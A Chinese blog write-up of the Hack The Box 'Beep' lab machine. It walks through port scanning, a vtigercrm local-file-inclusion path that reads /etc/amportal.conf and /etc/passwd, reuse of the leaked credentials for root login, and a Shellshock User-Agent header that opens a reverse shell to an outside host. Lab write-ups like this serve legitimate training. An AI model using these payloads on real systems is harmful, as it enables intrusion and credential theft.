【Hack The Box】linux练习-- beep

最新推荐文章于 2024-06-11 23:09:49 发布
最新推荐文章于 2024-06-11 23:09:49 发布
阅读量446 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 网络 服务器 Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127761261
版权

HTB 学习笔记

【Hack The Box】linux练习-- beep

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月9日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

nmap -sT -p- --min-rate 10000 10.129.68.60

在这里插入图片描述

22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
941/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.68.60/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            938/udp   status
|_  100024  1            941/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-11-08T17:07:58+00:00; +1h00m00s from scanner time.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about

smtp枚举

http

在这里插入图片描述这里更改一下,看下面这个

http://zh-cjh.com/zhuomianyunwei/1907.html

在这里插入图片描述在这里插入图片描述但我并不知道版本,不好利用,但是存在一个lfi比较有意思
通过分析exp,我们得知
lfi的产生点:/vtigercrm/graph.php?current_language=…/…/…/…/…/…/…/…//etc/amportal.conf%00&module=Accounts&action

首先访问该路径:是一大堆配置文件
右键查看源代码将给我们最好的观看体验

在这里插入图片描述
在这里插入图片描述找到了好几个这样子的相同密码,接下来我们访问/etc/passwd来获取一下用户,而后进行爆破

在这里插入图片描述但是在passwd中并没有发现除了root以外的任何用户(因为没有用户uid大于1000)
这个时候思考会不会是在给出的exp中我们漏掉了用户名?
再次去检查一下

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

密码确定了,而且这个应该还是3306的账号密码
用户是asteriskuser和admin,当然还有root,我们尝试一下登陆root

用户名root
密码:jEhdIekWmdjE
登陆成功,获取两个flag

第二种方法

我们来到10000端口
在这里插入图片描述
弱口令无效
我们进行一下目录爆破

这是cgi

https://10.10.10.7:10000/session_login.cgi
GET /session_login.cgi HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1

就这么使用即可,拿到的shell就是root

方法三(没完成)

在这里插入图片描述
在这里插入图片描述
freepbs是我们已知的比较脆弱的服务,但是我们需要找到他的入口
于是我搜了其他人的文章,发现了这个有意思的东西
我尝试可以下,确实可以

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Ubuntu 12.04下使用PC喇叭Beep
猛禽的编程艺术
06-06 5523
公司电脑没音箱,但是又需要一个提醒闹钟。很多年前用Windows的时候,用的是一个自己用BCB写的简单程序。后来换了Linux,用的是一个简单的beep脚本,然后放到cron里去跑的。不过最近升级到Ubuntu 12.04以后发现它不响了……那个发声的脚本是很简单的:#!/bin/sh for i in $(seq 4) do /usr/bin/beep -f 800 -l
实战HackTheBox里面的Beep
知柯信安
01-11 1623
与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。 # Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.033s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/t
Hack the box靶机 beep
菜浪马废的博客
05-19 194
看看有没有漏洞可用 查看网页源代码 会让信息更立正 用得到的信息直连ssh可以获得root
Linux 蜂鸣器实验
最新发布
qq_44219883的博客
06-11 289
在本章实验中蜂鸣器使用的 PIN 为 SNVS_TAMPER1,因此先检查 PIN 为 SNVS_TAMPER1这个 PIN 有没有被其他的 pinctrl 节点使用,如果有使用的话就要屏蔽掉,然后再检查GPIO5_IO01 这个 GPIO 有没有被其他外设使用,如果有的话也要屏蔽掉。其余步骤仍旧和上一节编写驱动开发类似。
hackthebox-beep(考点:elastix)
冬萍子癸水
04-10 396
nmap 很多端口,看到ssh想到登录。再看看80 打开是elastix 网上搜搜相关漏洞 https://www.exploit-db.com/exploits/37637 主要就是这个,以后看到elastix先来一发这俩。 https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc...
HackTheBox::Beep
aya3t的博客
10-10 293
HackTheBox::Beep
Linux-driver(led-beep-key).rar_linux beep
09-21
对于标题中的"Linux-driver(led-beep-key).rar_linux beep",我们可以聚焦于Linux下的LED、蜂鸣器和按键驱动,以及异步通知机制。这些内容是构建嵌入式系统或设备驱动程序开发的基础,特别是对于S5PC100这样的平台。...
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3526
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 347
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
my-2440-beep.rar_beep_linux 2.6.30 s3c24
09-14
Linux 2.6.30内核在S3C2440上的Beep设备驱动解析》 在嵌入式系统开发中,理解和掌握设备驱动的编写是至关重要的一步,尤其是在Linux环境下。本篇文章将深入探讨Linux 2.6.30内核在三星S3C2440处理器上的Beep...
BEEP:BEEP-开源蜜蜂监控-AppAPIsensor数据
04-09
BEEP-开源蜜蜂监视(v2.2.1) BEEP是蜜蜂监控(Laravel PHP)框架API +一个(Angular JS)应用程序和一个(Influx)时间序列传感器数据数据库的组合。 创建成本有效的测量硬件也有第一步。 它的关键功能是将用户...
Linux speaker beep
cpuwolf的成长笔记
10-20 1670
有时候Linux写script,想在任务完成完成是让speaker通知一声。查了一下发现真的很简单。echo -en "/007" 
Linux驱动_pinctrl子系统和gpio子系统(LED)
qq_42174306的博客
01-25 1566
目录 前言 一、修改设备树文件 (1)添加pinctrl节点 (2)添加led设备节点 (3)检查LED对应pin脚是否被使用 (4)启动系统 二、详细驱动程序 三、测试 前言 inctrl子系统和gpio子系统_anieoo的博客-CSDN博客 一、修改设备树文件 (1)添加pinctrl节点 打开imx6ull-alientek-emmc.dts文件,在 iomuxc 节点的...
Linux c语言 beep,用Beep()函数来实现c语言编写歌曲
weixin_32306957的博客
05-15 870
Beep()函数来实现c语言编写歌曲Beep()函数是一个可以控制扬声器发出提示音的函数,包含在windows.h内.实际上,所有用到Sleep()函数的地方,都可以用这个,待后面细细说来。要准备什么?一首歌的所有音符所对应的音高,音值。将这些信息转换为音符频率,持续时间怎样做?首先,让我们知道,什么是音音是由于物体的震动而产生的.在自然界中能为我们人的听觉所感受的音是非常多的,但并不是所有的音...
linux beep 实验
weixin_45205160的博客
05-11 253
linux 蜂鸣器实验、使用设备树、gpio、pinctl子系统实现
0x11-HackTheBox-Beep
0pr
05-26 377
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
Linux 驱动学习笔记 - beep(九)
tyustli
04-13 488
Linux 驱动学习笔记 - beep(九) 本系列均为正点原子 Linux 驱动的学习笔记, 以便加深笔者记忆。如读者想进一步学习,可以到正点原子官网中下载资料进行学习。 添加 pinctrl 节点 在 iomuxc 节点的 imx6ul-evk 子节点下创建一个名为 pinctrl_beep 的子节点,节点内容如下所示: / { &iomuxc { imx6ul-evk { ...
linux beep,软响铃 ── 把 beep 换成音乐
weixin_39640372的博客
05-25 424
很多人千方百计想关掉控制台(或 X终端模拟器)的嘀嘀声。我觉得有提示音不一定是坏事,但是那个嘀嘀声听起来的确有点烦人。而且在我的irssi 中那个 beep提示音实在是太小声了(而且也不好听)。经过一番寻找,找到了这个softbeep。softbeep可以拦截多个发出 beep 的动作,并将其转化成运行任意命令,包括播放音乐。softbeep 可以拦截这些事件:写入 tty 控制台的 bell 字...
linux驱动开发 | beep驱动
myWorld001的博客
08-10 187
1
C++函数之---Beep函数
07-28
Beep函数是一个Windows API函数,用于在计算机上发出声音。它的原型为:WINBASEAPI WINBOOL WINAPI Beep (DWORD dwFreq, DWORD dwDuration)。\[1\]该函数接受两个参数,dwFreq表示要发出的声音的频率,dwDuration...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值